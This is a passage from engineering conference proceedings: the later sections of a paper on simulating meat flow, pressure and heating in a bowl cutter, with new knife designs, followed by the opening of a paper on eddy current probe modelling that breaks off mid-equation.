4 Results 4.1 Establishment of the Features of the Hydrodynamics of Meat Raw Materials in the Working Area of the Cutter by Simulation It is enough to clearly and holistically see the picture of the movement of meat raw materials during curing allows mathematical modelling using numerical methods. Figure 6 and 7 present the simulation results. It follows from them that the flow injected by knives No1 and No2 of the cutter head leaves the grinding zone at an angle of 20°–35° to the axis of rotation of the knives, depending on the frequency of their rotation. This angle value corresponds to the angle of sharpening cutter knives. Further, the flow of raw materials hits the wall of the bowl and moves along the walls and the lid. The speed of the layers of raw meat significantly depends on the measurement plane – high speed values are observed in the zone described by the ends of the knives. Smaller values – in areas adjacent to the landing part of the cutter head. At a knife rotation frequency of 50 s−1 , the maximum speed of meat raw materials reaches 115 m/s, the average values are 77.2 m/s. At a knife rotation frequency of 25 s−1 , the maximum speed of meat raw materials reaches 100.7 m/s, the average values are 50.6 m/s. At a knife rotation frequency of 12.5 s−1 , the maximum speed of raw meat reaches 72 m/s, the average values are 36.4 m/s. The pressure distribution fields correspond to the described features of the feedstock hydrodynamics. At a knife rotation frequency of 50 s−1 , the maximum value of raw meat pressure reaches 5.5 MPa, the average value is 0.96 MPa. At a knife rotation frequency of 25 s−1 , the maximum value of raw meat pressure reaches 3.2 MPa, the average value is 0.52 MPa. At a knife rotation frequency of 12.5 s−1 , the maximum value of raw meat pressure reaches 1.8 MPa, the average value is 0.26 MPa. A smaller amount of raw materials is available in zone 1, which is formed by the removal of raw materials from the grinding zone by the knives of the first cutting plane due to adhesion forces. The minimum amount of raw material is in zone 2, the raw material in it is discarded by the knives in the plane of their rotation during the run-out (braking) of the cutter head. Zone 3 is characteristic, in which there are no traces of raw materials. This indicates the absence of raw material rejection by the blades of knives No3–6, in contrast to knives No1 and No2.
394
O. Batrachenko
Fig. 6. Visualization of the results of simulation of the kinematics of meat raw materials movement in the internal volume of the bowl: (a) at a knife rotation frequency of 50 s−1 ; (b) at a knife rotation frequency of 25 s−1 ; (c) at a knife speed of 12.5 s−1
If we compare results of the study of heating the surface of meat raw materials and structural elements with the results of the study of the hydrodynamics of raw materials, we can draw the following conclusions. The highest temperature is in those layers of raw materials that are discarded by the knives of the head, pass diagonally along the surface of the bowl, rise up and are directed along the inner surface of the cover of the knife head to the zone of the middle radius of the bowl. This flow is shown in Fig. 6 with a blue midline. It corresponds to the maximum pressure (Fig. 7). The layers of raw materials, thrown away by the knives of the cutter head, have a somewhat lower temperature and then move along the wall of the bowl with friction along it. This flow is shown in Fig. 6 with a blue line located on the left. The layers of raw materials have the minimum temperature, the knives of the cutter head are lifted up, and along the inner surface of the cover of the cutter head they get into that part of the bowl that rotates at the minimum radius. This thread is shown in Fig. 6 with a blue line located on the right at the central cone of the bowl.
Modelling of Hydrodynamics of Meat Raw Materials
395
Fig. 7. Visualization as a result of simulation of the pressure distribution of raw meat in horizontal plane of the bowl: (a) at a knife rotation frequency of 50 s−1 ; (b) at a knife rotation frequency of 25 s−1 ; (c) at a knife speed of 12.5 s−1
A confirmation of the simulation results can be the photo presented in Fig. 8, (a). It can be seen that the largest amount of raw materials is in zone 4 (formed by the rejection of raw materials by the blades of knives No1 and No2). The study of heating the surface of meat raw materials and structural elements makes it possible to obtain the following results (Fig. 8, (b)). The surface temperature tsur of the outer surface of the cutterhead cover takes on the following values: in the extreme right cylindrical part tsur = 6.5 °C; in the middle of the cylindrical part tsur = 6.4 °C; in the extreme left cylindrical part tsur = 5.0 °C; in the right conical part tsur = 4.5 °C; in the left conical part tsur = 2.0 °C. The raw material under the cover has a temperature from tsu r = −4.3 °C to tsur = 0.6 °C. We have developed a method for coordinating the parameters of the processes of supplying and grinding meat raw materials in order to increase the productivity of the cutter, improve the quality of processing of raw materials in it, and reduce energy consumption for the cuttering process.
396
O. Batrachenko
Fig. 8. Photofixation of the distribution of raw materials on the surface of the knife head cover (a) and temperature fields of raw materials and the outer surface of the knife head cover (b): 1 – raw material removed by knives of the first cutting plane from the grinding zone due to adhesion; 2 – raw material, which is discarded by knives in the plane of their rotation when braking the knife head; 3 – the area where there are no traces of raw materials; 4 – raw materials that are discarded with knife blades
The solution of the above problematic task is based on the use of the concept of improving technological equipment previously developed by the author. According to its provisions, an effective solution is one in which a new function in the system is implemented with the least expenditure of material, energy and funds through the use of structural elements or force fields already existing in the system. The most rational should be considered the case when a negative factor begins to bring a positive result. In this case, the available force fields should be understood as the high kinetic energy of the pieces of raw material after it has been crushed by one of the head knives. It is proposed to use this energy for grinding meat raw materials on fixed (static) cutting elements (knives) installed in the direction of movement of meat raw materials after grinding with one of the knives of the cutter head. Schematic diagram of the proposed device is shown in Fig. 9. A static type device for increasing the performance of the cutter consists of at least one static knife 1, which is placed after the cutter head 2 in the direction of rotation of the bowl 3. Each static knife 1 is located mainly perpendicular to the sharpened surfaces 4 of the knives 5 of the rotating cutter head 2 when they move in the bowl 3. The device is additionally equipped with at least one holder 6, a housing 7, a transmission mechanism 8 and a drive 9. In this case, each static knife 1 is fixed in the housing 7 with the help of a holder 6 with the possibility of rotation around a vertical axis. The rotation of static knives 1 is performed under the action of the drive 9 using the transmission mechanism 8. The operation of the drive 9 is subordinated to the cutter control system. When the cutter head rotates, the head knives intensively discard the cut layers of meat raw materials in a direction close to the perpendicular to the knife sharpening surfaces, i.e. – forward and towards the bowl in the direction of its rotation.
Modelling of Hydrodynamics of Meat Raw Materials
397
The cut layers of raw meat collide with knives 1and, due to their high kinetic energy, are crushed on them (the speed of the layers of raw meat is close to the linear speed of movement of the knife points, 70–160 m/s). This provides additional intensive grinding of meat raw materials without the use of excess energy and harmful excess heating, which leads to an increase in the performance of the cutter while reducing its energy consumption and improving the quality of raw material processing. The implementation of static knives 1 rotary allows to adapt the operating modes of the device to increase the grinding ability of the cutter in the manufacture of minced meat of various types of sausages, as well as within one cycle at the beginning of grinding lumpy meat raw materials and during the final emulsification of structureless minced meat.
Fig. 9. Schematic diagram of a device of a static type to increase the specific productivity of the cutter: (a) diagram of the device; (b), (c), (d) device design
398
O. Batrachenko
So, when grinding minced raw smoked sausages, as well as at the beginning of cutting lumpy meat raw materials, static knives 1 are located in the direction of flight of the layers of meat raw materials (Fig. 10, (a)). This ensures the grinding of raw meat by cutting it with cutting slices of knives 1. When grinding minced meat of structureless sausages (boiled sausages, sausages, sausages, etc.), especially at the end of the cuttering cycle (when emulsifying minced meat), knives 1 layers of meat raw materials (Fig. 10, (b)), which contributes to the grinding of raw meat by dispersion upon impact. When rotating the cutter bowl without rotating the knives of the cutter head, the knives of device 1 are located in the direction of rotation of the cutter bowl (Fig. 10, (c)).
Fig. 10. The position of the elements of the static type device to improve the performance of the cutter under different cutting conditions
The transmission mechanism 8 can be made in the form of a rack and pinion that rotates the gears of the holders 4, or in the form of a worm shaft that rotates the worm wheels of the holders 4, or in the form of a drive rod and a system of rotary levers that return the holders 4, etc. The drive 9 can be made in the form of a stepper motor with or without a gearbox, in the form of a hydraulic or pneumatic cylinder, etc. As a result, when using this device, it becomes possible to use a negative factor to obtain positive effects, namely, to increase the productivity of the cutter, reduce energy consumption for the cuttering process and reduce the heating of raw materials during cuttering.
Modelling of Hydrodynamics of Meat Raw Materials
399
Industrial tests of the developed design of the device make it possible to establish that when using it, the performance of the cutter is increased by 45%, and without increasing energy consumption, and the minced meat temperature is reduced by 3 °C. In general, we can talk about reducing the energy consumption of the cutter for one cycle of processing meat raw materials. 4.2 Simulation of the Hydrodynamics of Raw Materials in the Flow Around a Knife In order to make reasonable and effective design decisions to improve cutter knives, in particular, improve the quality of processing of raw materials and increase the strength of the knife, it is necessary to have a clear understanding of the features of the contact of the knife with the raw material that flows around it during cuttering. In order to determine the features of the hydrodynamics of the feedstock when flowing around cutter knives, numerical simulation of the movement of the feedstock around the cross section of the cutter is carried out. To simulate the movement of raw meat at the stage of its fine grinding in the cutter, the following initial data are used (Fig. 11, 12, 13 and 14): the speed of the movement of the liquid is set in the range v = 20…120 m/s; fluid motion mode – laminar; liquid density – 1050 kg/m3 , liquid viscosity – from η = 30 Pa·s (as for emulsifying meat raw materials at the final stage of the cutting process) to η = 700 Pa·s (as for grinding lumpy meat raw materials at the beginning of the cutting process). The sharpening angle of the knife blade is 14° (as an average value of kinematic cutting angle of knives used in practice). As follows from the data obtained, when the knife flows around the direction of movement of raw material changes significantly – after moving along the sharpening of the blade, the flow rushes further, bending around the upper side surface of the knife, and does not contact the upper rear part of the knife. However, the part of the flow that goes around the knife from below also deviates significantly from initial direction after the contact with the cutting edge of the blade. As a result, the distribution of flow velocity and pressure values in the zones where the raw material, the knife blade and its body come into contact is determined. Figure 11 illustrates the location of velocity vectors for emulsified minced meat flow for a partial simulation case (with flow viscosity η = 30 Pa·s and flow velocity v = 125 m/s). It is this mode of movement of raw material that is chosen for illustration, since the viscosity of 30 Pa·s corresponds to the final stage of curing (minced meat with a fine degree of grinding), and the minimum viscosity of raw material corresponds to its minimum deviation from initial direction of movement when flowing around the knife. The pressure values in the flow of meat raw materials are given in Fig. 12, 13 and 14. At the same time, Fig. 12 illutrates the true value of the pressure in the flow around the knife in the form of a fill. For clarity, the visualization of its values is given in Fig. 13, which shows the value of the pressure in the flow around the knife in the form of a fill, but with such settings of the results obtained, in which the maximum pressure value is limited to 10 Pa, which is made for clarity of the pressure above and below the knife.
400
O. Batrachenko
Fig. 11. Distribution of the flow rate of raw meat when flowing around the cross section of the knife with a flow viscosity η = 30 Pa·s and its speed v = 125 m/s
Fig. 12. Hydrodynamic pressure in the flow of raw meat when flowing around a knife, Pa (viscosity – 30 Pa·s, cutting speed – 125 m/s; visualization in the form of filling)
The layers of raw meat, which are cut off with a knife in this case, move at a speed in the range of 76–89 m/s. The limit layers of raw materials move at a speed, the value of which should be zero at a distance from the surface of the knife up to 2 mm. The maximum pressure occurs in the zone of the cutting edge of the knife, it reaches 10.5 MPa, around the cutting edge the pressure reaches 5.4 MPa and then decreases to 2.8 MPa. Above the upper side surface of the knife and below it, the pressure is negative. It can be seen that above the upper side surface of the knife near its blade, the pressure decreases to −1.1 MPa, and further along the width of the knife it reaches − 0.68…−0.46 MPa. Negative pressure values on the upper part of the knife, along with the minimum values of the speed of raw meat in this zone, indicate the absence of raw meat in it. That is, as mentioned above, there is no contact of meat raw materials with the upper side surface of the knife, in particular, with its back part. This is confirmed by Fig. 14. Figure 14, a presents the distribution of pressure above and below the knife section in the form of a two-dimensional graph. In this case, the ordinate axis, relative to which the value of the pressure in the flow is determined, is located horizontally, the abscissa axis is vertical. The values located to the left of the vertical abscissa are positive (under the knife), and the values to the right of the vertical abscissa are negative (above the knife), which indicates that the raw meat does not
Modelling of Hydrodynamics of Meat Raw Materials
401
Fig. 13. Hydrodynamic pressure in the flow of meat raw materials when flowing around a knife, Pa, the maximum pressure value is limited to 10 Pa (viscosity – 30 Pa·s, cutting speed – 125 m/s; visualization in the form of filling)
contact the upper surface of the knife. The minimum value of pressure in the section under consideration (above the knife) reaches −0,75 MPa. Figure 14, b presents the distribution of pressure from above the knife section along its width in the form of a two-dimensional graph. In this case, the ordinate axis, relative to which the pressure value in the flow is determined, is located vertically, the abscissa axis is horizontal. This graph allows to evaluate the change in pressure over the knife along its cross section. The minimum pressure value is observed at the blade (near its inclined surface) and reaches −0.81 MPa. In order to confirm the simulation results, high-speed video recording of the process of grinding meat raw materials with cutter knives is used. Figure 15 illustrates the results of determining the nature of the flow around the knife with raw materials using highspeed video. From Fig. 13 it can be seen that the layer of raw material cut off by knife No. 1 moves at a significant angle to the cut of the layer of raw material supplied by the cutter bowl. The cut layer of raw materials does not contact the corresponding side surface of the knife, which fully corresponds to the results of numerical simulation. In more detail, the flow diagrams of cutter knives with raw materials according to previously known ideas and according to the established research results are shown in Fig. 16. The established new information about the hydrodynamics of meat raw materials during cutting makes it possible to propose a new way to increase the strength of knives – a differentiated increase in their thickness (Fig. 17, (a), (b)). This ensures the simultaneous fulfillment of two important requirements – low heating of raw material due to the small thickness of the blade in the zone of contact with meat raw materials and higher knife strength due to the increased thickness in the back, most stressed part of the knife, which is not in contact with raw material. Taking into account the developed design of the knife (Fig. 16, (a), (b)) and recommendations for reducing the width of the knife [8, 9], the design is presented in Fig. 18, i. Such a design can be expected to simultaneously achieve an increase in cutter performance, a decrease in raw material heat and an increase in knife strength. Combining both developed technical solutions, we have proposed the following design of the cutter knife (Fig. 18). The knife consists of a plate 1 having a blade 2 with
402
O. Batrachenko
Fig. 14. Hydrodynamic pressure in the flow of raw meat when flowing around a knife, Pa (viscosity – 30 Pa·s, cutting speed – 125 m/s; visualization in the form of a two-dimensional graph)
Fig. 15. The nature of the flow around the knife with meat raw materials during its cutting: (a) at the beginning of cutting a piece of meat; (b) at the end of the process of cutting a piece of meat
Modelling of Hydrodynamics of Meat Raw Materials
403
Fig. 16. Schemes of raw material flow around cutter knives: (a) according to previously known ideas; (b) according to established research results
Fig. 17. The scheme of work and types of cross sections of the knives of the developed design (Rn.max. = 0.3 m): (a) scheme of the knife; (b) knife cross-section type I; (c) knife cross-section type II
a cutting edge 3 and a seating surface 4 for fixing in the cutter head. The plate has sides 5 and 6 and a back side 7. Blade 2 has a sharpening 8. The height of the cross section of the knife h2 , measured in the area between the sides 5 and 6, is greater than the height of the cross section h1, measured in the area of connection 2 with the sides 5 and 6. The value of the height of the cross section of the knife h2 is sliding, the minimum on the side of the blade 2 and the maximum on the side of the back side 7. On the side of the plate 5, on which a layer of raw material flows when it is fed by the cutter bowl, a recess 9 with a depth of δ is made. The recess 9 extends along the surface of the lateral side 5 from the border located at a distance l from the cutting edge 3 to the back side of the plate 7. The distance l can take a value from the maximum lmax on the side of the seating surfaces of the cutter knife to the minimum lmin on the side farthest from the axis of rotation sections of the cutter knife. The value of the recess 9 can take on a value from the minimum δmin on the side of the cutting edge 3 of the cutter knife to the maximum δmax on the side of the back side 7 of the cutter knife (Fig. 18, (d)),
404
O. Batrachenko
which makes it possible to increase the strength of the knife without compromising its efficiency. The intensity of heat release can be estimated from the friction energy dissipation in raw material, determined by numerical simulation (Fig. 19). In the area more distant from the axis of rotation of the knife, a higher value of energy dissipation is observed. This indicates a greater contribution of this part of the knife to the total increase in heat during cutting compared to the part of the knife that is adjacent to the landing part, despite the significantly smaller friction surface area of the removed part. This difference is explained by the significantly higher linear speeds of movement of these parts of the knife (the values differ by 2–3 times).
Fig. 18. Cuter knife with reduced contact area with raw materials: 1 – plate; 2 – blade; 3 – cutting edge; 4 – landing surfaces; 5, 6 – lateral sides; 7 – back side; 8 – sharpening; 9 – deepening; (a) a diagram of the operation of a knife with a recess h; (b) general view of the knife; (c) the cross section of the knife when making recess 9 of a steady thickness; (d) cross-section of the knife when making recess 9 of variable thickness
When a knife of a standard design is rotated, the energy dissipation is 105 units when it is measured at a distance of 2 mm from the knife surface (Fig. 19, a). While for a knife of the developed design, the dissipation in the zone of the recess in the knife decreases to 5.5·104 units, which is almost half as much as for a knife of a standard design (Fig. 19, b). When measuring energy dissipation at a distance of 5 mm from the surface of the knife, its maximum value for a knife of a standard design also reaches 105 units (Fig. 19, (c)), and for a knife of a developed design, the dissipation in the recess zone in the knife decreases to 1.5·104 units, which is almost an order of magnitude less in relation to a knife of a standard design (Fig. 19, (d)).
Modelling of Hydrodynamics of Meat Raw Materials
405
The simulation results show that the use of a new knife design can significantly reduce the heating intensity and temperature gradient in the raw material, depending on the depth of the layer under consideration, by 30% to 6.7 times (Fig. 19, (b) and Fig. 19, (d)). And since the heating of the raw material is mainly due to the mechanisms of energy dissipation due to the friction of the knives on the raw material, there will be a decrease in the heating of minced meat and a decrease in energy consumption of the cutter drive.
Fig. 19. Distribution of energy dissipation in raw meat during cutting: (a) at the distance of 2 mm from the surface of a knife of a standard design; (b) at the distance of 2 mm from the surface of the knife of a new design type II; (c) at the distance of 5 mm from the surface of a knife of a standard design; (d) at the distance of 5 mm from the surface of the knife of a new design type II
To check the sufficient strength of the knife of the developed design, numerical simulation of the stress-strain state of the knives of the developed designs is carried out. When modelling, the value of the frontal pressure on the blade is determined by rotating the knife with a radius of 300 mm at a frequency of 4500 min−1 . It is set in the range from 0.53 MPa to 2.9 MPa along the length of the blade. The pressure on the side surface of the knife is assumed to be 6 kPa, the thickness of the knife is 5 mm. Alloy steel with a yield strength of 620.4 MPa is chosen as the model material.
406
O. Batrachenko
The results of simulation (the value of stresses σmax in accordance with Fig. 20 and the safety factor Kz.m.) are shown in Table 1, and their visualization is shown in Fig. 21.
Fig. 20. Numbers of points of a knife at measurement of stresses in it Table 1. Values of stresses in knives of different structure No knife points (according to Fig. 20)
Knives of variable thickness Stress σmax , MPa
Strength margin
Stress σmax , MPa
Strength margin
1
50.8
12.2
55.6
11.2
2
50.3
12.3
54.1
11.5
3
26.9
23.1
30.6
20.3
4
74.2
8.4
76.2
8.1
type I
type II
Based on the simulation results, it is found that the proposed knife designs can significantly increase their strength in the most stressed areas, in which the destruction of knives most often occurs. The design of the type II knife, along with a decrease in the heating of raw material, makes it possible to increase its strength at points 3 and 4 by 34% and 24.5%, respectively. In addition, it becomes possible to reduce the voltage at points 3 and 4 compared with a standard blade by 10.1% and 17.4%, respectively. This proves the rationality of the decisions made in the work and the prospects for using knives of developed designs, which cause less heating of minced meat during emulsification and have increased strength, including when processing lumpy and frozen raw materials. Industrial tests of the developed design of knives makes it possible to establish that when using the cutter, the productivity of the cutter increases by 15%, the minced meat temperature decreases by 1.5 °C, and energy costs are reduced by 7%.
5 Discussion One of the reasons for the heating of raw material during cuttering is its intense friction on the surfaces of the bowl and the cover of the cutter head due to the high kinetic energy after the knives discard the first cutting plane. This fact is important in the search for
Modelling of Hydrodynamics of Meat Raw Materials
407
Fig. 21. Visualization of the stress state of knives of different designs (stress, MPa): (a) type I (upper side); (b) type I (lower side); (c) new design type II; (d) type II (lower side)
effective ways to reduce the heating of raw materials and increase the productivity of cutters. The obtained simulation results are confirmed by high-speed video recording data. It follows from them that when cutting at the average and maximum speed of the knives, the raw meat is thrown out of the grinding zone at a high speed, reaching 70–115 m/s, by knives No1 and No2 of the cutter head at an angle of 20°–35° to the planes of rotation of the knives. As a result, the raw material acquires high kinetic energy, which, according to the known laws of physics, turns into heat during the subsequent braking of the cut layers of raw meat against the bowl wall and the bowl lid and the cutterhead cover. These characteristic features of the hydrodynamics of meat raw materials in the working area of the cutter immediately lead to three significant negative phenomena: • decrease in productivity of the cutter due to the removal of meat raw materials from the grinding zone; • too high unproductive energy consumption for the curing process;
408
O. Batrachenko
• intensive heating of meat raw materials, due to which, in order to eliminate protein denaturation, flake ice or ice water specially made on the appropriate equipment should be added to meat raw materials. According to the results of studies of the hydrodynamics of meat raw materials, it follows that when flowing around the knife profile, both at the beginning of cutting (at a flow viscosity of 700 Pa·s) and at the end of the cutting process (at a flow viscosity of 30 Pa·s), the following phenomenon is observed. When flowing around the upper part of the knife profile, the flow of raw materials after moving along the sharpening of the blade continues to move around the upper horizontal side of the knife without contacting. This phenomenon is observed for the entire range of linear cutting speeds used in practice (20…180 m/s). The results obtained radically change the idea of the contact features of cutter knives with raw meat, which may be the basis for further improvement of cutter knives and cutter heads. The results of mathematical modelling of the process of ejecting minced meat with knives from the cutting zone complement the experimental work of other researchers and allow quantitative measurement to determine the speed and direction of movement of the minced meat layers. And the results of mathematical modelling of the process of the meat mince flowing around the knives of the cutter are new, presented for the first time. They serve as the basis for the development of new cutter knife designs. The results presented in the article correlate well with experimental data in terms of the direction of minced meat being thrown from the knife head and the process of the minced meat flowing around the knife. But it would be expedient to develop a generalized mathematical model that would allow determining all the necessary features of the hydrodynamics of minced meat in a cutter, including the dissipation of turbulent energy and the ejection of minced meat from the cutting area by knives upwards due to frictional forces. Such a mathematical model would be very useful for further scientific research, but, obviously, much more powerful computer hardware will be needed for its calculation, which may cause difficulties in the implementation of such a mathematical model in practice. It would also be appropriate to simulate the operation of the developed device for increasing the productivity of the cutter in order to determine the most effective location of the blades, the orientation of the blade sharpening, etc. All these problems can be solved in further research.
6 Conclusions This article presents the results of research, the use of which will increase the productivity of bowl cutters and their reliability in work. It is the use of mathematical modelling with the help of the SolidWorks software complex, in particular, its FlowSimulation and Simulation modules, that allow us to obtain such data that would be too difficult to obtain purely by experiment. The obtained results make it possible to propose new ways of improving bowl cutters. The scientific novelty of the obtained results is as follows.
Modelling of Hydrodynamics of Meat Raw Materials
409
For the first time, it is established that at the stage of emulsification of meat raw materials, the knife of the bowl cutter does not contact raw materials with one of its side surfaces. When flowing around the upper part of the knife profile, the flow of raw material, after moving along the blade sharpening, continues to move around the upper horizontal side of the knife without making contact. This phenomenon is observed for the entire range of linear cutting speeds used in practice (20…180 m/s). The obtained results significantly expand the search for effective ways to increase the strength of bowl cutter knives. An understanding of the peculiarities of the interaction of bowl cutter knives with raw materials has been developed. When cutting at the average and maximum speed of the knives, raw meat is thrown out of the grinding zone at a high speed, reaching 70–115 m/s, by knives No1 and No2 of the cutter head at an angle of 20°–35° to the planes of rotation of the knives. As a result, raw material acquires high kinetic energy, which is further converted into heat during the subsequent braking of the cut layers of raw meat against the bowl wall and the bowl lid and the cutter head cover. The practical significance of the obtained results is that, on their basis, a new type of device has been developed to increase the productivity of the bowl cutter and two new designs of knives. Their use makes it possible to increase the productivity of the cutter by 60% and reduce the temperature of minced meat by 4.5 °C. At the same time, a significant reduction in energy consumption of the bowl cutter for one cycle of processing raw meat is noted when using the developed device for increasing the productivity of the bowl cutter. Further research should be devoted to improving the developed device to increase the productivity of the bowl cutter by adapting it to work with different raw materials. Also, taking into account the peculiarities of the hydrodynamics of meat raw materials in the bowl cutter, it is advisable to develop new prefabricated designs of knives that would have significantly higher strength, ease of use and reduced cost.
References 1. Ismail, M.A., Chong, G.H., Ismail-Fitry, M.R.: Comparison of the microstructural, physicochemical and sensorial properties of buffalo meat patties produced using bowl cutter, universal mixer and meat mixer. J. Food Sci. Technol. 58(12), 4703–4710 (2021). https://doi.org/10. 1007/s13197-020-04960-y 2. Vodyanova, I.V., Storrø, I., Olsen, A., Rustad, T.: Mathematical modelling of mixing of salt in minced meat by bowl-cutter. J. Food Eng. 112, 144–151 (2012) 3. Hammer, G., Stoyanov, S.: Kuttern mit zwei Messern und Kutterleistung. Bundesforschungsanstalt Ernahrung Lebensmittel Jahresbericht 01, 24–26 (2007) 4. Hammer, G.F., et al.: Brühwurstbrät – Kuttern mit verschiedenen Messern. Mitteilungsblatt Fleischforschung Kulmbach 168, 57–64 (2005) 5. Hammer, G., Stoyanov, S.: Kuttermesser - unterschiedliche anscliff- und gleitwinkel. Mittteilungsblatt Fleischforschung Kulmbach 49, 183–195 |(2010) 6. Hammer, G., Stoyanov, S.: Uber das Kuttern von Bruhwurstbrat. Mitteilungsblatt Fleischforschung Kulmbach 47, 243–251 (2008) 7. Stoyanov, S., Hammer, G.: Kuttern: kräfte am messer, temperatur und leistung. Kulmbacher Woche - Kurzfassung Vortrag. 4, 27–31 (2007)
410
O. Batrachenko
8. Schnackel, W., Micklisch, I., Krickmeier, J., Schnackel, D.: Untersuchungen zur optimierung von kuttermessern. 3. Optierugen der kuttermessform zur herstellung von bruhwursten. Fleischwirtschaft 6, 96–102 (2008) 9. Schnackel, W., Micklisch, I., Krickmeier, J., Schnackel, D.: Optimisation of cutter knives for the production of cooked sausages. Food Scince, Engineering and Technologies, pp. 77–83. Plovdiv (2008) 10. Haack, E., Schnackel, W., Haack, O.: Messerverscheib ist reduzierbar ablaufe in der einzelnen schneidebenen eines schneidsatz eneines fleischwolfes. Fleischwirtschaft 7, 23–26 (2003) 11. Haack, E., Schnackel, W., Krickmeier, J.: Wirkungsgrade deutlich verbessern. Fleischwirtschaft 6, 25–33 (2012) 12. Batrachenko, A.V., Filimonova, N.V.: The influence of structural and kinematic parameters of working bodies of the meat grinders on its productivity. Foods Raw Mater. 5, 118–131 (2017) 13. Haack, E., Schnackel, W., Stoyanov, S.: Wolftechnik - der rohstoff spielt eine doppelrolle - Konstruktions qualität und abgestimmte Messergeometrien ermöglichen neue Leistungsbereiche. Fleischwirtschaft 1, 50–55 (2007) 14. Haack, E., Schnackel, W.: Kombinationsmöglichkeiten quasi unbegrenzt - Trennsysteme zur Aufwertung stofflicher Eigenschaften von Fleisch. Fleischwirtschaft 3, 49–54 (2008) 15. Haack, E., Schnackel, W.: Vom Rohstoff zum Feinbrät - ein Arbeitsgang - Trennsysteme zur Aufwertung stofflicher Eigenschaften von Fleisch. Fleischwirtschaft 4, 75–80 (2008) 16. Nekoz, A.I., Venglovskyi, O.L., Batrachenko, A.V.: Durability of cutter assemblies and its causative factors. Foods Raw Mater. 6, 358–370 (2018) 17. Kolev, E., Stoyanov, S.: Verifikationsmethode zur Bestimmung der Belastung an Bauteilen durch simulation und experiment. Int. Wissenschaftliches Kolloquium 47, 23–26 (2002)
Computer Simulation of the Process of Profiles Measuring of Objects Electrophysical Parameters by Surface Eddy Current Probes Volodymyr Halchenko, Ruslana Trembovetska(B) , Constantine Bazilo, and Natalia Tychkova Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The created computer model of the process of measuring continuously changing profiles of electrical conductivity and magnetic permeability in objects with a surface eddy current probe is considered as a tool for developing a computationally efficient metamodel on artificial neural networks, necessary for solving the inverse electrodynamic problem. Also, this computer model is used to simulate the measurement processes in various frequency modes of excitation of eddy currents in magnetic and non-magnetic test objects to study the sensitivity of the method to distinguish a series of slightly different profiles, to determine the optimal frequency ranges that provide the highest possible levels of the output signal of the surface probe. The reliability of the computer model is verified on simple test cases when the near-surface layer is represented by one- and two-layer approximation. It is assumed that in these layers the values of electrical parameters are unchanged. The coincidence with acceptable accuracy of the results of calculations using the created computer model, oriented to a conditionally multilayer representation of test objects, and obtained results for simple cases, for which there are analytical dependences for calculating the output signal of eddy current probes, is shown. As a result of their comparison the adequacy of the created software is proved. A series of model experiments for test objects made of magnetic and non-magnetic materials has been carried out, allowing to make some recommendations regarding the choice of probe’s excitation modes, taking into account the specifics of materials magnetic properties. Keywords: Reconstruction of electrophysical parameters · metamodel · electrical conductivity · magnetic permeability · distinction of profiles
1 Introduction Knowledge of the profiles of electrical conductivity and magnetic permeability in the near-surface layers of machine building parts provides complete information about the microstructure of their material, which largely determines the performance properties and reliability. It is effective to obtain such information by non-destructive testing methods as a result of simultaneous measurement of profiles directly during the technological © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 411–424, 2023. https://doi.org/10.1007/978-3-031-35467-0_25
412
V. Halchenko et al.
process of manufacturing parts or their operation. It is preferable to carry out measurements in real time without stopping the entire technological process as a whole. Such requirements can be met by using the eddy current method of non-destructive testing, which is illustrated, for example, by studies [1]. As a rule, such measurements systematically combine physical measurements using an eddy current probe and subsequent numerical signal processing, which involves the reconstruction of profiles as a result of inversion within the framework of solving a multiparameter inverse problem [2]. When implementing this signal processing approach, solutions of direct and inverse problems are required. This issue has been studied by scientists for a long time since the 90s of the last century, so they have accumulated quite a lot of experience in solving such problems, although this does not allow us to fully consider all the questions that arise. However, in recent years, interest in the problem has resumed again due to the emergence of new opportunities as a result of the development of modern methods of computational mathematics, opening up new perspectives in the intensive intellectual processing of large amounts of data. A number of researchers have chosen a way to complicate the designs of measuring probes [3–5]. A number of additional elements are introduced into the design of the probes, most often these are additional coils. Such modifications lead to obtaining additional information about the measured electrophysical parameters and, consequently, to an increase in computational resources required for its processing. The same disadvantage is inherent in another approach chosen by the authors [1, 6–8], where multifrequency excitation of eddy currents in the object is used. But the most important thing is that both approaches are focused on the processing of basic and additional information directly at the measurement stage. This is problematic for real time implementation. The measurement techniques used by a number of researchers, using compensation and the phenomenon of invariance [1, 6–8], practically exclude the possibility of measuring both electrical conductivity and permeability profiles simultaneously. The method proposed by the authors in [12, 13], which uses additional information about the object obtained previously, when processing a signal already physically measured as a result of a natural experiment, does not have these disadvantages. It is called approximation method and stores a priori obtained information in the so-called metamodel. This approach involves carrying out full-scale model studies of the structure of the test object, when factual experimental measurement results are combined, as well as methods and tools for creating an a priori mathematical model, which is built on previously obtained data about the object. Note that the solution of the inverse problem of simultaneous reconstruction of both profiles from the signal of the eddy current probe in real time implies the existence of a highly productive model for solving the direct problem, i.e., determining the amplitude and phase of the signal with known profiles of electrophysical parameters. This function is performed by the metamodel. The fact of not only the accurate display of the indicated dependence, but also the insignificant computational resources required for its application is important. In turn, the metamodel can be built using computational technologies [14–18] based on an “accurate” electrodynamic model of the measurement process with a surface eddy current probe.
Computer Simulation of the Process of Profiles Measuring
413
Thus, the aim of this article is research, using the created computer model of the measurement process with a surface eddy current probe, to establish the sensitivity of distinction of close conductivity and magnetic permeability profiles that are continuously changing in the near-surface layer of test objects made of magnetic and non-magnetic material.
2 Materials and Methods The basis for creating a computer model of the profile measuring process is the UzalCheng-Dodd-Deeds mathematical model [19–25]. It has a rather cumbersome form and is presented in full form by the authors in [26], where the assumptions adopted during its development are also formulated. We only note that it is used in a somewhat modified Theodoulidis version [19]. The mathematical model is made for a conventionally multilayer object with the number of layers L, where each t-th layer has electrical conductivity σt and magnetic permeability μt . The boundary between adjacent t-th and (t + 1)-th layers is located at the depth dt . The superposition of two components, namely, the field of the coil in free space without the presence of a conductor A(s) and the field created by the eddy currents A(ec) induced in the test object, forms the resulting electromagnetic field in the area below the excitation coil of the probe. Thus, taking into account the boundary conditions for different areas and using Cheng matrix method [25], the mathematical model of the measurement process with a surface eddy current probe in the area z1 < z ≤ z2 has the following form: ∞ A(r, z) = (1) J1 (κr) · Cs · eκz + Dec · e−κz d κ, 0
Cs =
μ0 · i0 χ (κr1 , κr2 ) −κz1 · · e − e−κz2 , 2 κ3
· i0 = N · I (r2 − r1 )−1 · (z2 − z1 )−1 , χ (x1 , x2 ) =
x2
x · J1 (x)dx,
x1
x2
